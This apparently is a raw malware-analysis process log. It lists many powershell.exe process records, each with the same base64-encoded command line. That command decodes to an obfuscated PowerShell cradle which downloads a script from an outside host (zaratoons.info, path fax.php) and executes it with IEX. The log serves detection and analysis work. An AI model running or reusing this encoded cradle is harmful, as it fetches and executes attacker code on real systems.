"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
36
2492
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
37
1304
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
38
3104
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
39
3168
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
40
3200
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
41
3232
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
42
3284
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
43
3324
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
44
3440
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
45
3472
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
46
3532
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
47
3564
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
48
3608
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
49
3644
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
50
3676
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
51
3708
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
52
3732
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
53
3764
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
54
3784
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
55
3808
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
56
3836
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
57
3856
powershell.exe
1868
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
58
3864
powershell.exe
1960
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
59
3872
powershell.exe
2060
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
60
3884
powershell.exe
2336
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Opened
Read_From
Process
61
3896
powershell.exe
200
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Opened
Read_From
Process
62
3908
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Process
63
3916
powershell.exe
1204
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
64
3924
powershell.exe
2052
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Opened
Read_From
Process
65
3932
powershell.exe
2436
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
66
3940
powershell.exe
1972
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Opened
Read_From
Process
67
3948
powershell.exe
1416
powershell.exe
